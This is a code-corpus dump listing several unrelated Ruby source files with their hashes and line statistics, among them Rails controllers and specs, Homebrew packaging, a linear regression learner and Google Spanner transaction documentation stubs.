hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
e21b34126d2f61ae6a63a45af10d6a7908de9adb | 201 | module Datadog
module VERSION
  # Individual semantic-version components.
  MAJOR = 0
  MINOR = 47
  PATCH = 0
  # Pre-release tag; nil for a final release.
  PRE = nil

  # Assemble the dotted version string, appending PRE only when present.
  parts = [MAJOR, MINOR, PATCH]
  parts << PRE unless PRE.nil?
  STRING = parts.join('.')

  # Oldest Ruby this library supports.
  MINIMUM_RUBY_VERSION = '2.0.0'.freeze
end
end
| 15.461538 | 57 | 0.60199 |
1a34d45914adac0ae5471c2736fc07e1c1a5d6e2 | 306 | require_relative '../../helper'
require_relative 'shared_spec_behaviors'
class Repositext
class Validation
# Spec for the Rtfile validation. SharedSpecBehaviors supplies the common
# validation examples, which run against @common_validation built below.
describe Rtfile do
include SharedSpecBehaviors
before {
# Minimal constructor arguments: a :primary triple and empty options.
# The '_' entries are placeholders that satisfy arity only — the shared
# behaviors don't read them. NOTE(review): confirm Rtfile.new's expected
# argument shapes against the Rtfile implementation.
@common_validation = Rtfile.new(
{:primary => ['_', '_', '_']}, {}
)
}
end
end
end
| 16.105263 | 43 | 0.594771 |
e2f1c58cba35e5a0b92c9353744d3786b180f403 | 492 | require 'yaml'
require 'active_record'
module Models
  # ActiveRecord model backed by the retrosheet events table. Column
  # metadata is described externally in
  # config/retrosheet_database_mapping.yml (relative to Retrodb::ROOT).
  class RetrosheetEvent < ActiveRecord::Base
    # Kept for backward compatibility with any external callers; the
    # class-level memoization below no longer relies on it.
    attr_accessor :column_mapping_memo

    class << self
      # Loads (and memoizes) the YAML column mapping.
      #
      # BUG FIX: the original `column_mapping_memo ||= ...` was parsed by
      # Ruby as a *local variable* assignment — `attr_accessor` defines
      # instance methods, not singleton methods — so the YAML file was
      # re-read on every call. Memoize in a class-level ivar instead.
      #
      # @return [Hash] per-column metadata hashes; each value is assumed to
      #   respond to ['db_column_name'] (see #column_names) — schema lives
      #   in the YAML file, not in this source.
      def column_mapping
        @column_mapping_memo ||= YAML::load_file(File.join(Retrodb::ROOT, 'config', 'retrosheet_database_mapping.yml'))
      end

      # @return [Array] the 'db_column_name' of every mapped column, in
      #   mapping order. (Replaces a `map` that was used as `each` to
      #   accumulate into a temporary array.)
      def column_names
        column_mapping.map { |_key, data| data['db_column_name'] }
      end
    end
  end
end
| 19.68 | 118 | 0.638211 |
6a12dff699d7ea8372558265854b9019c8304a21 | 1,199 | # @!group /service_manager/
# @method get_services_for_type
# @overload get '/v0/service_manager/persistent_services/:publisher_namespace/:type_path'
# Return array of services attached to the service :publisher_namespace/:type_path
# @return [Array]
# GET /v0/service_manager/persistent_services/:publisher_namespace/<type_path>
# Everything captured by the splat after the namespace segment is treated
# as the service type path; errors are reported via the encoded-exception
# helper rather than leaking a raw 500.
get '/v0/service_manager/persistent_services/:publisher_namespace/*' do
  begin
    splat_path = params['splat'].first
    params[:type_path] = splat_path
    call_params = assemble_params(params, [:publisher_namespace, :type_path], [])
    return_json_array(engines_api.registered_with_service(call_params))
  rescue StandardError => e
    send_encoded_exception(request: request, exception: e)
  end
end
#TODO finish this
#del '/v0/service_manager/persistent_service/del/:publisher_namespace/*' do
# begin
# p = params['splat'][0]
# te = p.dirname
# params[:service_handle] = p.basename
# params[:type_path] = te.dirname
# params[:parent_engine] = te.basename
# cparams = assemble_params(params, [:publisher_namespace, :type_path, :parent_engine, :service_handle], [])
# return_json_array(engines_api.force_deregister_persistent_service(cparams))
# rescue StandardError => e
# send_encoded_exception(request: request, exception: e)
# end
#end
# @!endgroup
| 36.333333 | 110 | 0.750626 |
b9cb71ae89a003f830c988914db2463f387409fe | 1,422 | # frozen_string_literal: true
class Profiles::KeysController < Profiles::ApplicationController
# get_keys is deliberately public (no authentication) so servers/admins can
# fetch a user's SSH keys over plain HTTP — see #get_keys below.
skip_before_action :authenticate_user!, only: [:get_keys]
# Lists the current user's keys and seeds a blank Key for the "add" form.
def index
@keys = current_user.keys.order_id_desc
@key = Key.new
end
# Shows a single key; scoping through current_user.keys means a foreign id
# raises RecordNotFound rather than exposing another user's key.
def show
@key = current_user.keys.find(params[:id])
end
# Creates a key via the service object, recording the requester's IP.
def create
@key = Keys::CreateService.new(current_user, key_params.merge(ip_address: request.remote_ip)).execute
if @key.persisted?
redirect_to profile_key_path(@key)
else
# Re-render the index with only persisted keys; @key carries the errors.
@keys = current_user.keys.select(&:persisted?)
render :index
end
end
# Destroys a key (HTML redirect or JS head-only response).
def destroy
@key = current_user.keys.find(params[:id])
Keys::DestroyService.new(current_user).execute(@key)
respond_to do |format|
format.html { redirect_to profile_keys_url, status: :found }
format.js { head :ok }
end
end
# Get all keys of a user(params[:username]) in a text format
# Helpful for sysadmins to put in respective servers
def get_keys
if params[:username].present?
begin
user = UserFinder.new(params[:username]).find_by_username
if user.present?
render plain: user.all_ssh_keys.join("\n")
else
return render_404
end
rescue => e
# NOTE(review): rendering the raw exception message to an unauthenticated
# client may leak internals — consider a generic error message instead.
render html: e.message
end
else
return render_404
end
end
private
# Strong parameters for key creation.
def key_params
params.require(:key).permit(:title, :key, :expires_at)
end
end
| 23.311475 | 105 | 0.664557 |
e9ae81c6fe2c3054122e6f66424a718c7a7aca55 | 665 | cask "preference-manager" do
version "4.5.2.0"
sha256 "780626b2e0a557f86e42ab899dadd727c1ef01f029ddd1ae98a4984365639971"
# The vendor's download URL encodes the version without dots (e.g. 4520).
url "https://www.digitalrebellion.com/download/prefman?version=#{version.no_dots}"
name "Preference Manager"
desc "Trash, backup, lock and restore video editor preferences"
homepage "https://www.digitalrebellion.com/prefman/"
livecheck do
url "https://www.digitalrebellion.com/prefman/download"
strategy :page_match do |page|
# The download page carries the dotless version in an href query string.
match = page.match(%r{href=.*?/prefman\?version=(\d+(?:\.\d+)*)"}i)
next if match.blank?
# Re-insert dots between digits: gsub appends '.' after every character
# ("4520" -> "4.5.2.0.") and chop drops the trailing dot.
match[1].gsub(/./, '\0.').chop.to_s
end
end
app "Preference Manager.app"
end
| 30.227273 | 84 | 0.702256 |
e823067c909c446154fdf9a9e00cb66dda9971ef | 387 | # encoding: utf-8
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
module Azure
  module ContainerRegistry
    module Mgmt
      module V2019_06_01_preview
        module Models
          #
          # Defines values for TriggerStatus
          #
          module TriggerStatus
            Disabled = "Disabled"
            Enabled = "Enabled"
          end
        end
      end
    end
  end
end
| 22.764706 | 70 | 0.710594 |
61f7b3c6586fc6173043bdfc48cebdb10f144909 | 236 | class AddQuery < ActiveRecord::Migration[4.2]
# Forward migration: add a free-form text `query` column to both web tables.
def self.up
  %i[web_forms web_vulns].each do |table|
    add_column table, :query, :text
  end
end
# Rollback: drop the `query` column from both web tables.
def self.down
  %i[web_forms web_vulns].each do |table|
    remove_column table, :query
  end
end
end
| 21.454545 | 45 | 0.741525 |
bb234c7b64460886446639cad562cd26dc795ce4 | 1,586 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'bulma/css/version'
# Gemspec for bulma-css: packages the Bulma stylesheet for the Rails asset
# pipeline. Only change vs. original: the user-facing post-install message
# had a grammatical error ("Thank you for installation ...").
Gem::Specification.new do |spec|
spec.name = "bulma-css"
spec.version = Bulma::Css::VERSION
spec.authors = ["Ankur Singh"]
spec.email = ["[email protected]"]
spec.summary = "Ruby gem to integrate bulma css to rails"
spec.description = "Adds bulma.css to the rails asset pipeline"
spec.homepage = "https://github.com/rush-skills/bulma-css"
spec.license = "MIT"
# Prevent pushing this gem to RubyGems.org by setting 'allowed_push_host', or
# delete this section to allow pushing this gem to any host.
if spec.respond_to?(:metadata)
spec.metadata['allowed_push_host'] = "https://rubygems.org"
else
raise "RubyGems 2.0 or newer is required to protect against public gem pushes."
end
# Ship everything tracked by git except tests/specs/features.
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.require_paths = ["lib"]
spec.add_dependency 'railties', '>= 3.1'
spec.add_development_dependency "bundler", "~> 1.11"
spec.add_development_dependency "rake", "~> 10.0"
spec.add_development_dependency 'rails', '>= 3.1'
spec.post_install_message = "Thank you for installing bulma-css. \n\n" \
"**********************************************\n\n" \
"You can now use it by adding\n\n" \
"*= require bulma\n\n" \
"to your application.css file.\n\n" \
"Happy hacking!\n\n" \
"**********************************************\n"
end
| 37.761905 | 104 | 0.618537 |
e9585590e526dfa946d94f8e8e8559d7387f5de8 | 181 | require "test_helper"
# Integration test covering the dashboard's public home page.
class DashboardControllerTest < ActionDispatch::IntegrationTest
# A plain GET to the home route should respond with HTTP success (2xx).
test "should get home" do
get dashboard_home_url
assert_response :success
end
end
| 20.111111 | 63 | 0.790055 |
bb969ec880f727fba5cda57fd94628e125e3a62c | 2,333 | require "rails_helper"
require "shared_rutines"
# Controller spec for locale resolution. Only changes vs. original: typo
# fixes in the example descriptions ("broser" -> "browser", "somple" ->
# "simple", "prefered" -> "preferred"); all expectations are untouched.
RSpec.describe LocalesController, type: :controller do
describe "#default_locale" do
before do
# Pin I18n state and clear cookie/header hints so each example starts clean.
I18n.default_locale = :en
I18n.available_locales = %i[en en-US es]
cookies.permanent[:locale] = nil
request.headers["Accept-Language"] = nil
end
it "sets the default locale without hints" do
put :default_locale
expect(cookies.permanent[:locale]).to eq(I18n.default_locale)
end
it "sets the default locale with browser hints" do
request.headers["Accept-Language"] = "es;q=1.0"
put :default_locale
expect(cookies.permanent[:locale]).to eq(:es)
end
end
describe "#site_locale" do
before do
I18n.default_locale = :en
I18n.available_locales = %i[en en-US es]
cookies.permanent[:locale] = nil
end
it "sets a simple locale from the supported list" do
patch :site_locale, params: { locale: :es }
expect(cookies.permanent[:locale]).to eq(:es)
end
it "sets a composed locale from the supported list" do
patch :site_locale, params: { locale: :"en-US" }
expect(cookies.permanent[:locale]).to eq(:"en-US")
end
it "sets a simple locale from a partially supported composed locale" do
patch :site_locale, params: { locale: :"es-GT" }
expect(cookies.permanent[:locale]).to eq(:es)
end
it "sets a default locale from an unsupported locale" do
request.headers["Accept-Language"] = nil
patch :site_locale, params: { locale: :ru }
expect(cookies.permanent[:locale]).to eq(I18n.default_locale)
end
it "sets a browser-preferred simple locale from an unsupported locale" do
request.headers["Accept-Language"] = "es;q=1.0"
patch :site_locale, params: { locale: :ru }
expect(cookies.permanent[:locale]).to eq(:es)
end
it "sets a browser-preferred composed locale from an unsupported locale" do
# NOTE(review): the header is composed (es-GT) but the expected result is
# the simple :es — the controller appears to fall back to the base
# language; confirm the description matches the intended behavior.
request.headers["Accept-Language"] = "es-GT;q=1.0"
patch :site_locale, params: { locale: :ru }
expect(cookies.permanent[:locale]).to eq(:es)
end
it "changes the locale after it's set" do
patch :site_locale, params: { locale: :"en-US" }
patch :site_locale, params: { locale: :es }
expect(cookies.permanent[:locale]).to eq(:es)
end
end
end
| 32.402778 | 78 | 0.657951 |
1da55e93ce9f28db27b3a05d6508428dac9f11b0 | 760 | require 'matrix'
module ML
module Learner
# Implementation of linear regression
# Implementation of linear regression: ordinary least squares solved via
# the normal equations (pseudo-inverse of the design matrix).
class LinearRegressionLearner
  include Toolbox
  include LinearToolbox

  # Initialize linear regression
  #
  # @param [Integer] dim the input dimension
  def initialize(dim)
    @dim = dim
  end

  # Train with supervised data: solves w = (X^T X)^-1 X^T y and stores the
  # weight vector via #current_vector= (provided by LinearToolbox).
  #
  # @param [Hash] data supervised input data (mapping from feature Array to
  #   numeric label)
  def train!(data)
    x = Matrix.rows(data.keys)
    # Ruby hashes preserve insertion order, so #values lines up with #keys.
    # Replaces the original `for` loop that accumulated labels manually.
    y = Matrix.column_vector(data.values)
    x_t = x.transpose
    # Moore–Penrose pseudo-inverse (assumes X^T X is invertible, i.e. the
    # features are linearly independent — same assumption as the original).
    x_dag = (x_t * x).inverse * x_t
    self.current_vector = x_dag * y
  end
end
end
end | 22.352941 | 80 | 0.586842 |
d5da59be14fbd4920e3cd155ae95e7c72e965e2d | 176 | class InstanceController < ApplicationController
# Renders the deployment instance identifier (from ENV['INSTANCE']) as JSON.
# Name kept camelCase because it is an externally routed action.
def getInstance
  render json: { current_instance: ENV['INSTANCE'] }, status: :ok
end
end | 29.333333 | 55 | 0.767045 |
181d088bfa2eaf041a4632eb77d962ab02ccf058 | 1,497 | class Asymptote < Formula
desc "Powerful descriptive vector graphics language"
homepage "https://asymptote.sourceforge.io"
url "https://downloads.sourceforge.net/project/asymptote/2.62/asymptote-2.62.src.tgz"
sha256 "60b085316b65af6a0e5132a8451c13b642cfe91c9096dc35d43b7b77a9dd2014"
bottle do
sha256 "64b808892251efca9174dedbca7c7053771d5f6ea84777562a6a92275ba1b50f" => :catalina
sha256 "ee051fe8dd1b6162d5686c0a0f8a0fc9dd6268c7befc72952721f6f6ab5f7413" => :mojave
sha256 "cc10a84f49fd48428e79d8f5792335c5b4f4dcf51be79c1a013f946321c7e82d" => :high_sierra
end
depends_on "fftw"
depends_on "ghostscript"
depends_on "glm"
depends_on "gsl"
# The PDF manual is fetched separately and installed into doc (see install).
resource "manual" do
url "https://downloads.sourceforge.net/project/asymptote/2.62/asymptote.pdf"
sha256 "afd22e35f984a6187ea4064f217dc167ff897864db23b825d4cbd78cd7114710"
end
# Builds and installs asy plus its Emacs keywords file, installing the
# pre-built PDF manual instead of regenerating docs locally.
def install
system "./configure", "--prefix=#{prefix}"
# Avoid use of MacTeX with these commands
# (instead of `make all && make install`)
# Touching the PDF makes the build treat the docs as already generated.
touch buildpath/"doc/asy-latex.pdf"
system "make", "asy"
system "make", "asy-keywords.el"
system "make", "install-asy"
doc.install resource("manual")
(share/"emacs/site-lisp").install_symlink pkgshare
end
# Smoke test: render a minimal .asy drawing and check the PDF appears.
test do
(testpath/"line.asy").write <<~EOF
settings.outformat = "pdf";
size(200,0);
draw((0,0)--(100,50),N,red);
EOF
system "#{bin}/asy", testpath/"line.asy"
assert_predicate testpath/"line.pdf", :exist?
end
end
| 31.851064 | 93 | 0.728123 |
285681bfb793bfc5a0e03aa5c5580efe5ea22342 | 1,046 | #
# Be sure to run `pod lib lint NavigationRoute.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'NavigationRoute'
# NOTE: s.version is referenced by s.source's tag below — keep it first.
s.version = '1.0.0'
s.summary = 'StackView Navigation.'
s.description = <<-DESC
iOS StackView Navigation Tool
DESC
s.homepage = 'https://github.com/zerojian/NavigationRoute'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'zerojian' => '[email protected]' }
# Release tags in the repo are expected to match the podspec version.
s.source = { :git => 'https://github.com/ZeroJian/NavigationRoute.git', :tag => s.version.to_s }
s.ios.deployment_target = '8.0'
s.swift_version = '4.0'
s.source_files = 'NavigationRoute/Classes/**/*'
s.dependency "SnapKit"
end
| 30.764706 | 108 | 0.624283 |
2801d57c78c9b479dacf11161061a504048cae7a | 220 | require 'support/file_system_support'
RSpec.configure do |config|
# Run only examples tagged :focus ...
config.filter_run :focus => true
# ... but fall back to the whole suite when nothing is focused.
config.run_all_when_everything_filtered = true
# NOTE(review): this is an RSpec 2.x opt-in that was removed in RSpec 3
# (symbols are always treated as metadata there) — confirm the RSpec
# version in use before relying on this line.
config.treat_symbols_as_metadata_keys_with_true_values = true
end
| 24.444444 | 63 | 0.827273 |
bbe1262c2989c44de94d6f33bc62a088c61d2e0b | 300 | #!/usr/bin/env ruby
require 'rubygems'
require 'gosu'
require 'ruby/snake/game/window'
module Ruby
module Snake
# Game entry point
# Thin wrapper around the Gosu window: the window is built eagerly in
# #initialize and displayed by #start.
class GameApp
def initialize
@game_window = Game::Window.new
end
# Shows the window; presumably blocks in Gosu's run loop until the
# window closes — TODO confirm against Game::Window.
def start
@game_window.show
end
end
end
end
| 13.636364 | 39 | 0.623333 |
d52f432ad483f498f6af78b6bc76187db78a09b5 | 22,577 | # Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
module Google
module Spanner
module V1
# = Transactions
#
# Each session can have at most one active transaction at a time. After the
# active transaction is completed, the session can immediately be
# re-used for the next transaction. It is not necessary to create a
# new session for each transaction.
#
# = Transaction Modes
#
# Cloud Spanner supports three transaction modes:
#
# 1. Locking read-write. This type of transaction is the only way
# to write data into Cloud Spanner. These transactions rely on
# pessimistic locking and, if necessary, two-phase commit.
# Locking read-write transactions may abort, requiring the
# application to retry.
#
# 2. Snapshot read-only. This transaction type provides guaranteed
# consistency across several reads, but does not allow
# writes. Snapshot read-only transactions can be configured to
# read at timestamps in the past. Snapshot read-only
# transactions do not need to be committed.
#
# 3. Partitioned DML. This type of transaction is used to execute
# a single Partitioned DML statement. Partitioned DML partitions
# the key space and runs the DML statement over each partition
# in parallel using separate, internal transactions that commit
# independently. Partitioned DML transactions do not need to be
# committed.
#
# For transactions that only read, snapshot read-only transactions
# provide simpler semantics and are almost always faster. In
# particular, read-only transactions do not take locks, so they do
# not conflict with read-write transactions. As a consequence of not
# taking locks, they also do not abort, so retry loops are not needed.
#
# Transactions may only read/write data in a single database. They
# may, however, read/write data in different tables within that
# database.
#
# == Locking Read-Write Transactions
#
# Locking transactions may be used to atomically read-modify-write
# data anywhere in a database. This type of transaction is externally
# consistent.
#
# Clients should attempt to minimize the amount of time a transaction
# is active. Faster transactions commit with higher probability
# and cause less contention. Cloud Spanner attempts to keep read locks
# active as long as the transaction continues to do reads, and the
# transaction has not been terminated by
# {Google::Spanner::V1::Spanner::Commit Commit} or
# {Google::Spanner::V1::Spanner::Rollback Rollback}. Long periods of
# inactivity at the client may cause Cloud Spanner to release a
# transaction's locks and abort it.
#
# Conceptually, a read-write transaction consists of zero or more
# reads or SQL statements followed by
# {Google::Spanner::V1::Spanner::Commit Commit}. At any time before
# {Google::Spanner::V1::Spanner::Commit Commit}, the client can send a
# {Google::Spanner::V1::Spanner::Rollback Rollback} request to abort the
# transaction.
#
# === Semantics
#
# Cloud Spanner can commit the transaction if all read locks it acquired
# are still valid at commit time, and it is able to acquire write
# locks for all writes. Cloud Spanner can abort the transaction for any
# reason. If a commit attempt returns `ABORTED`, Cloud Spanner guarantees
# that the transaction has not modified any user data in Cloud Spanner.
#
# Unless the transaction commits, Cloud Spanner makes no guarantees about
# how long the transaction's locks were held for. It is an error to
# use Cloud Spanner locks for any sort of mutual exclusion other than
# between Cloud Spanner transactions themselves.
#
# === Retrying Aborted Transactions
#
# When a transaction aborts, the application can choose to retry the
# whole transaction again. To maximize the chances of successfully
# committing the retry, the client should execute the retry in the
# same session as the original attempt. The original session's lock
# priority increases with each consecutive abort, meaning that each
# attempt has a slightly better chance of success than the previous.
#
# Under some circumstances (e.g., many transactions attempting to
# modify the same row(s)), a transaction can abort many times in a
# short period before successfully committing. Thus, it is not a good
# idea to cap the number of retries a transaction can attempt;
# instead, it is better to limit the total amount of wall time spent
# retrying.
#
# === Idle Transactions
#
# A transaction is considered idle if it has no outstanding reads or
# SQL queries and has not started a read or SQL query within the last 10
# seconds. Idle transactions can be aborted by Cloud Spanner so that they
# don't hold on to locks indefinitely. In that case, the commit will
# fail with error `ABORTED`.
#
# If this behavior is undesirable, periodically executing a simple
# SQL query in the transaction (e.g., `SELECT 1`) prevents the
# transaction from becoming idle.
#
# == Snapshot Read-Only Transactions
#
# Snapshot read-only transactions provides a simpler method than
# locking read-write transactions for doing several consistent
# reads. However, this type of transaction does not support writes.
#
# Snapshot transactions do not take locks. Instead, they work by
# choosing a Cloud Spanner timestamp, then executing all reads at that
# timestamp. Since they do not acquire locks, they do not block
# concurrent read-write transactions.
#
# Unlike locking read-write transactions, snapshot read-only
# transactions never abort. They can fail if the chosen read
# timestamp is garbage collected; however, the default garbage
# collection policy is generous enough that most applications do not
# need to worry about this in practice.
#
# Snapshot read-only transactions do not need to call
# {Google::Spanner::V1::Spanner::Commit Commit} or
# {Google::Spanner::V1::Spanner::Rollback Rollback} (and in fact are not
# permitted to do so).
#
# To execute a snapshot transaction, the client specifies a timestamp
# bound, which tells Cloud Spanner how to choose a read timestamp.
#
# The types of timestamp bound are:
#
# * Strong (the default).
# * Bounded staleness.
# * Exact staleness.
#
# If the Cloud Spanner database to be read is geographically distributed,
# stale read-only transactions can execute more quickly than strong
# or read-write transaction, because they are able to execute far
# from the leader replica.
#
# Each type of timestamp bound is discussed in detail below.
#
# === Strong
#
# Strong reads are guaranteed to see the effects of all transactions
# that have committed before the start of the read. Furthermore, all
# rows yielded by a single read are consistent with each other -- if
# any part of the read observes a transaction, all parts of the read
# see the transaction.
#
# Strong reads are not repeatable: two consecutive strong read-only
# transactions might return inconsistent results if there are
# concurrent writes. If consistency across reads is required, the
# reads should be executed within a transaction or at an exact read
# timestamp.
#
# See {Google::Spanner::V1::TransactionOptions::ReadOnly#strong TransactionOptions::ReadOnly#strong}.
#
# === Exact Staleness
#
# These timestamp bounds execute reads at a user-specified
# timestamp. Reads at a timestamp are guaranteed to see a consistent
# prefix of the global transaction history: they observe
# modifications done by all transactions with a commit timestamp <=
# the read timestamp, and observe none of the modifications done by
# transactions with a larger commit timestamp. They will block until
# all conflicting transactions that may be assigned commit timestamps
# <= the read timestamp have finished.
#
# The timestamp can either be expressed as an absolute Cloud Spanner commit
# timestamp or a staleness relative to the current time.
#
# These modes do not require a "negotiation phase" to pick a
# timestamp. As a result, they execute slightly faster than the
# equivalent boundedly stale concurrency modes. On the other hand,
# boundedly stale reads usually return fresher results.
#
# See {Google::Spanner::V1::TransactionOptions::ReadOnly#read_timestamp TransactionOptions::ReadOnly#read_timestamp} and
# {Google::Spanner::V1::TransactionOptions::ReadOnly#exact_staleness TransactionOptions::ReadOnly#exact_staleness}.
#
# === Bounded Staleness
#
# Bounded staleness modes allow Cloud Spanner to pick the read timestamp,
# subject to a user-provided staleness bound. Cloud Spanner chooses the
# newest timestamp within the staleness bound that allows execution
# of the reads at the closest available replica without blocking.
#
# All rows yielded are consistent with each other -- if any part of
# the read observes a transaction, all parts of the read see the
# transaction. Boundedly stale reads are not repeatable: two stale
# reads, even if they use the same staleness bound, can execute at
# different timestamps and thus return inconsistent results.
#
# Boundedly stale reads execute in two phases: the first phase
# negotiates a timestamp among all replicas needed to serve the
# read. In the second phase, reads are executed at the negotiated
# timestamp.
#
# As a result of the two phase execution, bounded staleness reads are
# usually a little slower than comparable exact staleness
# reads. However, they are typically able to return fresher
# results, and are more likely to execute at the closest replica.
#
# Because the timestamp negotiation requires up-front knowledge of
# which rows will be read, it can only be used with single-use
# read-only transactions.
#
# See {Google::Spanner::V1::TransactionOptions::ReadOnly#max_staleness TransactionOptions::ReadOnly#max_staleness} and
# {Google::Spanner::V1::TransactionOptions::ReadOnly#min_read_timestamp TransactionOptions::ReadOnly#min_read_timestamp}.
#
# === Old Read Timestamps and Garbage Collection
#
# Cloud Spanner continuously garbage collects deleted and overwritten data
# in the background to reclaim storage space. This process is known
# as "version GC". By default, version GC reclaims versions after they
# are one hour old. Because of this, Cloud Spanner cannot perform reads
# at read timestamps more than one hour in the past. This
# restriction also applies to in-progress reads and/or SQL queries whose
# timestamp become too old while executing. Reads and SQL queries with
# too-old read timestamps fail with the error `FAILED_PRECONDITION`.
#
# == Partitioned DML Transactions
#
# Partitioned DML transactions are used to execute DML statements with a
# different execution strategy that provides different, and often better,
# scalability properties for large, table-wide operations than DML in a
# ReadWrite transaction. Smaller scoped statements, such as an OLTP workload,
# should prefer using ReadWrite transactions.
#
# Partitioned DML partitions the keyspace and runs the DML statement on each
# partition in separate, internal transactions. These transactions commit
# automatically when complete, and run independently from one another.
#
# To reduce lock contention, this execution strategy only acquires read locks
# on rows that match the WHERE clause of the statement. Additionally, the
# smaller per-partition transactions hold locks for less time.
#
# That said, Partitioned DML is not a drop-in replacement for standard DML used
# in ReadWrite transactions.
#
# * The DML statement must be fully-partitionable. Specifically, the statement
# must be expressible as the union of many statements which each access only
# a single row of the table.
#
# * The statement is not applied atomically to all rows of the table. Rather,
# the statement is applied atomically to partitions of the table, in
# independent transactions. Secondary index rows are updated atomically
# with the base table rows.
#
# * Partitioned DML does not guarantee exactly-once execution semantics
# against a partition. The statement will be applied at least once to each
# partition. It is strongly recommended that the DML statement should be
# idempotent to avoid unexpected results. For instance, it is potentially
# dangerous to run a statement such as
# `UPDATE table SET column = column + 1` as it could be run multiple times
# against some rows.
#
# * The partitions are committed automatically - there is no support for
# Commit or Rollback. If the call returns an error, or if the client issuing
# the ExecuteSql call dies, it is possible that some rows had the statement
# executed on them successfully. It is also possible that statement was
# never executed against other rows.
#
# * Partitioned DML transactions may only contain the execution of a single
# DML statement via ExecuteSql or ExecuteStreamingSql.
#
# * If any error is encountered during the execution of the partitioned DML
# operation (for instance, a UNIQUE INDEX violation, division by zero, or a
# value that cannot be stored due to schema constraints), then the
# operation is stopped at that point and an error is returned. It is
# possible that at this point, some partitions have been committed (or even
# committed multiple times), and other partitions have not been run at all.
#
# Given the above, Partitioned DML is good fit for large, database-wide,
# operations that are idempotent, such as deleting old rows from a very large
# table.
# @!attribute [rw] read_write
# @return [Google::Spanner::V1::TransactionOptions::ReadWrite]
# Transaction may write.
#
# Authorization to begin a read-write transaction requires
# `spanner.databases.beginOrRollbackReadWriteTransaction` permission
# on the `session` resource.
# @!attribute [rw] partitioned_dml
# @return [Google::Spanner::V1::TransactionOptions::PartitionedDml]
# Partitioned DML transaction.
#
# Authorization to begin a Partitioned DML transaction requires
# `spanner.databases.beginPartitionedDmlTransaction` permission
# on the `session` resource.
# @!attribute [rw] read_only
# @return [Google::Spanner::V1::TransactionOptions::ReadOnly]
# Transaction will not write.
#
# Authorization to begin a read-only transaction requires
# `spanner.databases.beginReadOnlyTransaction` permission
# on the `session` resource.
# NOTE(review): these look like generated protobuf doc stubs — the three
# inner classes appear to be the mutually exclusive transaction modes
# (proto oneof); confirm against the generated source before hand-editing.
class TransactionOptions
# Message type to initiate a read-write transaction. Currently this
# transaction type has no options.
class ReadWrite; end
# Message type to initiate a Partitioned DML transaction.
class PartitionedDml; end
# Message type to initiate a read-only transaction.
# @!attribute [rw] strong
# @return [true, false]
# Read at a timestamp where all previously committed transactions
# are visible.
# @!attribute [rw] min_read_timestamp
# @return [Google::Protobuf::Timestamp]
# Executes all reads at a timestamp >= `min_read_timestamp`.
#
# This is useful for requesting fresher data than some previous
# read, or data that is fresh enough to observe the effects of some
# previously committed transaction whose timestamp is known.
#
# Note that this option can only be used in single-use transactions.
#
# A timestamp in RFC3339 UTC \"Zulu\" format, accurate to nanoseconds.
# Example: `"2014-10-02T15:01:23.045123456Z"`.
# @!attribute [rw] max_staleness
# @return [Google::Protobuf::Duration]
# Read data at a timestamp >= `NOW - max_staleness`
# seconds. Guarantees that all writes that have committed more
# than the specified number of seconds ago are visible. Because
# Cloud Spanner chooses the exact timestamp, this mode works even if
# the client's local clock is substantially skewed from Cloud Spanner
# commit timestamps.
#
# Useful for reading the freshest data available at a nearby
# replica, while bounding the possible staleness if the local
# replica has fallen behind.
#
# Note that this option can only be used in single-use
# transactions.
# @!attribute [rw] read_timestamp
# @return [Google::Protobuf::Timestamp]
# Executes all reads at the given timestamp. Unlike other modes,
# reads at a specific timestamp are repeatable; the same read at
# the same timestamp always returns the same data. If the
# timestamp is in the future, the read will block until the
# specified timestamp, modulo the read's deadline.
#
# Useful for large scale consistent reads such as mapreduces, or
# for coordinating many reads against a consistent snapshot of the
# data.
#
# A timestamp in RFC3339 UTC \"Zulu\" format, accurate to nanoseconds.
# Example: `"2014-10-02T15:01:23.045123456Z"`.
# @!attribute [rw] exact_staleness
# @return [Google::Protobuf::Duration]
# Executes all reads at a timestamp that is `exact_staleness`
# old. The timestamp is chosen soon after the read is started.
#
# Guarantees that all writes that have committed more than the
# specified number of seconds ago are visible. Because Cloud Spanner
# chooses the exact timestamp, this mode works even if the client's
# local clock is substantially skewed from Cloud Spanner commit
# timestamps.
#
# Useful for reading at nearby replicas without the distributed
# timestamp negotiation overhead of `max_staleness`.
# @!attribute [rw] return_read_timestamp
# @return [true, false]
# If true, the Cloud Spanner-selected read timestamp is included in
# the {Google::Spanner::V1::Transaction Transaction} message that describes the transaction.
class ReadOnly; end
end
# A transaction.
# @!attribute [rw] id
# @return [String]
# `id` may be used to identify the transaction in subsequent
# {Google::Spanner::V1::Spanner::Read Read},
# {Google::Spanner::V1::Spanner::ExecuteSql ExecuteSql},
# {Google::Spanner::V1::Spanner::Commit Commit}, or
# {Google::Spanner::V1::Spanner::Rollback Rollback} calls.
#
# Single-use read-only transactions do not have IDs, because
# single-use transactions do not support multiple requests.
# @!attribute [rw] read_timestamp
# @return [Google::Protobuf::Timestamp]
# For snapshot read-only transactions, the read timestamp chosen
# for the transaction. Not returned by default: see
# {Google::Spanner::V1::TransactionOptions::ReadOnly#return_read_timestamp TransactionOptions::ReadOnly#return_read_timestamp}.
#
# A timestamp in RFC3339 UTC \"Zulu\" format, accurate to nanoseconds.
# Example: `"2014-10-02T15:01:23.045123456Z"`.
class Transaction; end
